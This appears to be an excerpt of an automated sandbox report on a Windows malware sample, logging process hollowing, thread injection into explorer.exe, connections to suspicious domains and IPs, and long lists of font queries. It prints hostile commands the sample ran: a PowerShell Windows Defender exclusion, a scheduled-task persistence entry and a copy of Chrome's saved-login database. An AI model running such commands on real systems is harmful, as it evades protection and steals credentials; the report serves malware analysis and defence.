Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h]	21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B5BA5 mov eax, dword ptr fs:[00000030h]	21_2_046B5BA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h]	21_2_045F1B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h]	21_2_045F1B8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A138A mov eax, dword ptr fs:[00000030h]	21_2_046A138A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0469D380 mov ecx, dword ptr fs:[00000030h]	21_2_0469D380
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461B390 mov eax, dword ptr fs:[00000030h]	21_2_0461B390
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612397 mov eax, dword ptr fs:[00000030h]	21_2_04612397

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Code function: 12_2_0040A140 LdrLoadDll,

12_2_0040A140

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 38.34.163.59 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.127.155 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.properscooter.com
Source: C:\Windows\explorer.exe	Domain query: www.jamesreadtanusa.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.116.236 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.uspplongee.com
Source: C:\Windows\explorer.exe	Domain query: www.bldh45.xyz
Source: C:\Windows\explorer.exe	Network Connect: 5.183.8.183 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dems-clicks.com
Source: C:\Windows\explorer.exe	Domain query: www.kickball.site
Source: C:\Windows\explorer.exe	Network Connect: 35.241.47.216 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.216 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: DF0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Memory written: C:\Users\user\Desktop\iuvRyl9i7D.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Thread register set: target process: 3616			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3616			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe			Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: explorer.exe, 00000012.00000000.306887660.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.345614636.0000000005E60000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.339387652.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.322719517.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager,
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Users\user\Desktop\iuvRyl9i7D.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
